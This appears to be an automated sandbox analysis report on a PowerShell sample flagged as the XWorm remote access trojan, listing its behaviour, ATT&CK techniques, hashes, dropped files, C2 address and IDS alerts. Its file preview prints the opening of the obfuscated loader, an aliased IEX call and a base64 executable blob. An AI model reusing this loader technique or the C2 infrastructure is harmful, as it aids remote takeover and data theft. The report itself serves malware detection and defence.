              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 0.2.powershell.exe.1ac16030578.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.powershell.exe.1ac16e49e40.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3913764509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1483546758.000001AC16DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1483546758.000001AC16083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3916503959.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3600, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3352, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 0.2.powershell.exe.1ac16030578.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.powershell.exe.1ac16e49e40.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3913764509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1483546758.000001AC16DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1483546758.000001AC16083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3916503959.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3600, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3352, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		1
              DLL Side-Loading              		211
              Process Injection              		1
              Disable or Modify Tools              		OS Credential Dumping111
              Security Software Discovery              		Remote Services11
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading              		121
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop Protocol1
              Clipboard Data              		1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
              Process Injection              		Security Account Manager121
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information              		LSA Secrets1
              System Network Configuration Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain Credentials2
              File and Directory Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync13
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              mhqxUdpe7V.ps110%VirustotalBrowse
              mhqxUdpe7V.ps113%ReversingLabsWin32.Trojan.Generic

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              92.255.57.1550%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              92.255.57.155true
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1504821903.000001AC25E46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://aka.ms/pscore68powershell.exe, 00000000.00000002.1483546758.000001AC15C31000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1483546758.000001AC15C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3916503959.0000000003101000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://go.micropowershell.exe, 00000000.00000002.1483546758.000001AC163FF000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1504821903.000001AC25E46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Iconpowershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    92.255.57.155
                                    		unknownRussian Federation
                                    		42253TELSPRUtrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1577168
                                    Start date and time:2024-12-18 08:14:15 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 25s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:9
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:mhqxUdpe7V.ps1
                                    renamed because original name is a hash value
                                    Original Sample Name:372ad160c5b235ae768490e898860d6797ba74b1ed8106496ffc5a7c1ccd464e.ps1
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winPS1@6/5@0/1
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 92%
                                    • Number of executed functions: 14
                                    • Number of non-executed functions: 3
                                    Cookbook Comments:
                                    • Found application associated with file extension: .ps1
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 3600 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    02:15:24API Interceptor7x Sleep call for process: powershell.exe modified
                                    02:15:31API Interceptor8039604x Sleep call for process: RegSvcs.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    92.255.57.155anyrunsample.ps1Get hashmaliciousUnknownBrowse
                                    • 92.255.57.155/1/1.png
                                    https://reviewgustereports.com/Get hashmaliciousCAPTCHA Scam ClickFix, XWormBrowse
                                    • 92.255.57.155/1/1.png

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    TELSPRUMiGFg375KJ.exeGet hashmaliciousXWormBrowse
                                    • 92.255.57.155
                                    anyrunsample.ps1Get hashmaliciousUnknownBrowse
                                    • 92.255.57.155
                                    sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                    • 92.255.57.75
                                    ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                    • 92.255.57.75
                                    fa20b849ebe7c53d59f3ed0fcfac8445ea08e7296af5a.exeGet hashmaliciousStealcBrowse
                                    • 92.255.57.89
                                    LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                    • 92.255.57.89
                                    SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                    • 92.255.57.89
                                    mMgFHz9PdG.exeGet hashmaliciousStealcBrowse
                                    • 92.255.57.89
                                    vCZfRWB1kd.exeGet hashmaliciousStealcBrowse
                                    • 92.255.57.89
                                    1891f566c018182f1b5826b5fe2a05d6927aff15638d2.exeGet hashmaliciousStealcBrowse
                                    • 92.255.57.89

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1628158735648508
                                    Encrypted:false
                                    SSDEEP:3:Nlllul5mxllp:NllU4x/
                                    MD5:3A925CB766CE4286E251C26E90B55CE8
                                    SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                    SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                    SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:@...e................................................@..........

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrajcapk.xdo.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzzekrex.fgy.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\590aee7bdd69b59b.customDesusertions-ms (copy)

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6220
                                    Entropy (8bit):3.7295667045435508
                                    Encrypted:false
                                    SSDEEP:96:jm5sCQQOLgkvhkvCCtJhbBuDH6hbB1iDHx:jm5sLsJhvhI
                                    MD5:D98DB6FE96E16D81FE7D7F548BBE009C
                                    SHA1:39902225B1C203A864E4271EFF48705852566477
                                    SHA-256:3096733FEC3C64D0E9ABD9EC072662CB6CD10B7B9D93D4325A877BBBA63046BD
                                    SHA-512:1314BC241C8A6570009AA720B37955D658AE951A57E6DAC6D759FD3523FBE35A910899BAACC4EB502FA6C26BDED6C7ECA2A3DE16CEF9D287BF04CEFA8798A831
                                    Malicious:false
                                    Preview:...................................FL..................F.".. ....'GDj...p6...Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj.......Q......Q......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y.9..........................=...A.p.p.D.a.t.a...B.V.1......Y.9..Roaming.@......EWsG.Y.9...........................V*.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y.9..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y.9..........................X=..W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.9....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.Y.9....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.Y.9................

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\5XHXO4M7DHTKL94017VD.temp

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6220
                                    Entropy (8bit):3.7295667045435508
                                    Encrypted:false
                                    SSDEEP:96:jm5sCQQOLgkvhkvCCtJhbBuDH6hbB1iDHx:jm5sLsJhvhI
                                    MD5:D98DB6FE96E16D81FE7D7F548BBE009C
                                    SHA1:39902225B1C203A864E4271EFF48705852566477
                                    SHA-256:3096733FEC3C64D0E9ABD9EC072662CB6CD10B7B9D93D4325A877BBBA63046BD
                                    SHA-512:1314BC241C8A6570009AA720B37955D658AE951A57E6DAC6D759FD3523FBE35A910899BAACC4EB502FA6C26BDED6C7ECA2A3DE16CEF9D287BF04CEFA8798A831
                                    Malicious:false
                                    Preview:...................................FL..................F.".. ....'GDj...p6...Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj.......Q......Q......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y.9..........................=...A.p.p.D.a.t.a...B.V.1......Y.9..Roaming.@......EWsG.Y.9...........................V*.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y.9..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y.9..........................X=..W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.9....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.Y.9....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.Y.9................

                                    Static File Info

                                    General

                                    File type:ASCII text, with very long lines (65459), with CRLF line terminators
                                    Entropy (8bit):5.195931400416405
                                    TrID:
                                      File name:mhqxUdpe7V.ps1
                                      File size:143'864 bytes
                                      MD5:d8e887ed6c14e9b9279b739aea8bb613
                                      SHA1:d5d2ade0c4896b1e7fc6318ec97dbb49ee1cb071
                                      SHA256:372ad160c5b235ae768490e898860d6797ba74b1ed8106496ffc5a7c1ccd464e
                                      SHA512:eb5c96ba7b726fca6edced657baf55b34157f6576f4a340a671ebe0705b06742ea281bdc2230c08aa9f8bd8b687dee6bbb2070eb16b1cdf467041301334a3f0f
                                      SSDEEP:3072:VDY+KK5sCTIO5MTe4ydXHLM8DIVI96igQycLQxvBzAqx9aKVo6sQ4aR6s:VDY+xiYIO5MTe4ydXHLM8DIVI96igQr4
                                      TLSH:C2E36C330202FD8F6B7F2F84E5043E951C68247B8B599558FACA0AA925B6520DF39DF4
                                      File Content Preview:ipconfig /flushdns...... $t0='AZAZAZIEX'.replace('AZAZAZ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQA

                                      File Icon

                                      Icon Hash:3270d6baae77db44

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-12-18T08:15:43.947086+01002858800ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:15:44.383553+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:15:44.423184+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:15:55.993778+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:15:55.995603+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:15:58.442744+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:15:58.442744+01002858801ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:16:07.619210+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:16:07.622697+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:16:19.244265+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:16:19.246948+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:16:28.596948+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:16:30.869806+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:16:30.871894+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:16:35.540659+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:16:35.586657+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:16:35.775609+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:16:35.777466+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:16:35.966382+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:16:35.971330+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:16:37.275818+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:16:37.278095+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:16:47.024809+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:16:47.027279+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:16:51.681721+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:16:51.687517+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:16:51.872600+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:16:51.874949+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:16:55.860763+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:16:55.863013+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:16:58.870117+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:17:02.360638+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:17:02.363894+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:17:07.338323+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
